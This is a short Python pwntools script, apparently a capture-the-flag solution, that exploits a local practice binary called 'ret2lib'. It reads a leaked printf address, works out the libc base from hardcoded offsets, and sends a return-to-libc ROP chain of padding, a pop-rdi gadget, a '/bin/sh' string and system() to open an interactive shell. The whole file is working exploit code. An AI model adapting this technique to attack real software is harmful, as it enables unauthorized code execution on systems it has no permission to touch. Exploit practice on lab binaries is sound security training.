#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import * 

p = process("./ret2lib")

p.recvuntil(":")

p.sendline("601020") # printf@plt

p.recvuntil(": ") # 此值為 "The content of the address : "

printf_addr = int(p.recvuntil(":").split("\n")[0],16) # 讀到 "Leave some message for me :"，並取記憶體位置

# GDB
printf_offset = 0x55800 # gdb -> off
system_offset = 0x45390
gadget_pop_rdi = 0x0000000000400843 # Use ROPgadget
sh_string = 0x4003c4 # gdb -> find

libc_base_address = printf_addr - printf_offset
system_address = libc_base_address + system_offset

print "This is base"
print libc_base_address

payload = cyclic(280)
payload += p64(gadget_pop_rdi) +p64(sh_string) + p64(system_address)

p.sendline(payload)

p.interactive()

